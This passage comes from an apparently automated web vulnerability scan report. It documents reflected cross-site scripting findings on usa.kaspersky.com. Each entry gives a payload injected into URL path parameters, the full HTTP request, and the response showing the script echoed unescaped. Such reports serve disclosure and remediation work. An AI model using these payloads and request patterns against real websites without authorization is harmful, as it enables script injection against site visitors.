Last-Modified: Sun, 04 Sep 2011 12:20:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138851"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:20:54 GMT
X-Varnish: 1163047201
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all8e94c"><script>alert(1)</script>8ee69f6e42a/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.176. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84fcc"-alert(1)-"e3f22eec311 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes84fcc"-alert(1)-"e3f22eec311/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138891"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:21:35 GMT
X-Varnish: 1163048557
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes84fcc"-alert(1)-"e3f22eec311/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_
...[SNIP]...

1.177. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ecf9"><script>alert(1)</script>35fe4c3edad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes2ecf9"><script>alert(1)</script>35fe4c3edad/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138882"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:21:24 GMT
X-Varnish: 1163048293
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes2ecf9"><script>alert(1)</script>35fe4c3edad/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.178. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acb2c"-alert(1)-"defda43c72b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zenacb2c"-alert(1)-"defda43c72b/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138925"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:22:08 GMT
X-Varnish: 1163049572
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zenacb2c"-alert(1)-"defda43c72b/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code
...[SNIP]...

1.179. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b57"><script>alert(1)</script>1399bdc859f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zenf4b57"><script>alert(1)</script>1399bdc859f/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138916"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:21:58 GMT
X-Varnish: 1163049277
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zenf4b57"><script>alert(1)</script>1399bdc859f/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.180. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55622"><script>alert(1)</script>5993aee8954 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme55622"><script>alert(1)</script>5993aee8954/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138959"
Content-Type: text/html; charset=utf-8
Content-Length: 31429
Date: Sun, 04 Sep 2011 12:22:48 GMT
X-Varnish: 1163050653
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme55622"><script>alert(1)</script>5993aee8954/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.181. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9524"-alert(1)-"162f95c534c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usathemef9524"-alert(1)-"162f95c534c/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:02 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138982"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:23:05 GMT
X-Varnish: 1163051271
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usathemef9524"-alert(1)-"162f95c534c/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)do
...[SNIP]...

1.182. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d980"><script>alert(1)</script>bb34429b864 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom8d980"><script>alert(1)</script>bb34429b864/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139033"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:24:00 GMT
X-Varnish: 1163052709
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom8d980"><script>alert(1)</script>bb34429b864/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.183. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad070"-alert(1)-"0a6f9a5e76e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usatheme/customad070"-alert(1)-"0a6f9a5e76e/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:24:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139057"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:24:21 GMT
X-Varnish: 1163053334
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
Name = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/customad070"-alert(1)-"0a6f9a5e76e/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.
...[SNIP]...

1.184. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc898"><script>alert(1)</script>be3f789ebb4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modulesdc898"><script>alert(1)</script>be3f789ebb4/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:25:26 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139126"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:25:40 GMT
X-Varnish: 1163055221
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modulesdc898"><script>alert(1)</script>be3f789ebb4/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.185. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 108f3"-alert(1)-"554f67a870 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules108f3"-alert(1)-"554f67a870/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:26:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139169"
Content-Type: text/html; charset=utf-8
Content-Length: 31327
Date: Sun, 04 Sep 2011 12:26:17 GMT
X-Varnish: 1163056369
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules108f3"-alert(1)-"554f67a870/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_
...[SNIP]...

1.186. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10988"-alert(1)-"4ffcedf6e1d was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock10988"-alert(1)-"4ffcedf6e1d/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:28:30 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139310"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:28:40 GMT
X-Varnish: 1163060495
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
geName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock10988"-alert(1)-"4ffcedf6e1d/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.187. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a097"><script>alert(1)</script>1622e582d22 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock3a097"><script>alert(1)</script>1622e582d22/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:28:01 +0000
